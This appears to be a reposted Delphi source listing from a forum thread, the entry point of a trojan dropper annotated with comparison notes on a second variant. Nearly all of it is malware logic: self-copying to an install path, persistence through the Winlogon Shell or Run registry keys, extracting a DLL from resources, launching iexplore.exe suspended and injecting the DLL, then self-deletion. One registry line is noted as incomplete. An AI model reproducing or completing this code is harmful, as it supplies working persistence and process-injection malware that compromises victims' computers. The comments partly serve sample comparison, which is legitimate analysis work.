assignfile(f,ExtractFilePath(ParamStr(0))+'key.txt');
if not fileexists(ExtractFilePath(ParamStr(0))+'key.txt') then
begin
rewrite(f);
closefile(f);
end;
end; }
// Program entry of the second variant: same install / persistence / drop /
// inject / self-delete flow as the first listing, minus the timestomping and
// the DeCryptStr lines. Differences worth noting for anyone comparing samples:
//  * the single-instance window class is 'Rejoice' rather than 'Rejoice_3.2';
//  * SysUtils is not in this variant's uses list, so CompareText, ExtractFile*,
//    IntToStr and AnsiStrIComp must come from SysUtils2 -- presumably a
//    trimmed private copy of the RTL; confirm;
//  * the Winlogon Shell line below is syntactically incomplete as pasted
//    (`'Explorer.exe '+` with no right operand) and will not compile; the
//    first listing has `+Gesy+ ExeFiles` there.
// The poster reports that it is the two Reg.AddValue persistence writes that
// the scanner flags.
var
isSetup: Bool;          // program-level, so zero-initialised (False) unless the install branch runs
SetupPathName: string;
begin
// Install only when NOT already running from Gesy + ExeFiles (Gesy is external to this file).
SetupPathName := Gesy + ExeFiles;
if (CompareText(paramstr(0), SetupPathName) <> 0) then
begin
try
if FileExists(SetupPathName) then
begin
FilesetAttr(SetupPathName, 0);   // presumably clears attributes so DeleteFile can succeed
DeleteFile(SetupPathName);
if FileExists(SetupPathName) then
begin
Halt;   // undeletable previous copy aborts the run
Exit;   // unreachable after Halt
end;
end;
CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False);
except
end;   // install errors are swallowed
isSetup := True;
// Persistence: Winlogon Shell (HKLM, normally needs admin) when judgesys = 3,
// otherwise a per-user Run entry named after ExeFiles.
if judgesys = 3 then
begin
Reg.AddValue(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'Shell', pchar('Explorer.exe '+), 1);   // incomplete expression as pasted -- see header note
end
else
begin
Reg.AddValue(HKEY_CURRENT_USER, 'SoftWare\Microsoft\Windows\CurrentVersion\Run', ExeFiles, pchar(Gesy + ExeFiles), 1);
end;
end;
// Single-instance check on a window presumably created by the injected DLL -- confirm.
if FindWindow('Rejoice', 'Windows IDE') = 0 then
begin
DllAllpath := Gesy + DLLFiles;
try
FilesetAttr(DllAllpath, 0);
DeleteFile(DllAllpath); { remove any existing copy of the DLL }
except
end;
if FileExists(DllAllpath) then { deletion failed, so pick a random name instead }
begin
DllAllpath := RandomFilename(DllAllpath);
end;
// ExtractRes is external; by its arguments it writes resource 'mydll' of type 'dllfile' to DllAllpath -- confirm.
if ExtractRes('dllfile', 'mydll', DllAllpath) then { write the DLL that will be injected }
begin
// Start a suspended iexplore.exe as host when the target is IE. IEPath is
// external; StartInfo is never zeroed; the process is never resumed or closed here.
if IEFiles = 'IEXPLORE.EXE' then
begin
CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
end;
PID := GetProcessID(IEFiles);                            // -1 on failure; unchecked
Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID);  { open the host process } // unchecked, never closed
InjectLibrary(Process, Pchar(DllAllpath));               // result ignored
end;
end;
if isSetup then
ExtDelMe;   // original dropper removes itself via Deleteme.bat
Halt;
end.
再贴一下代码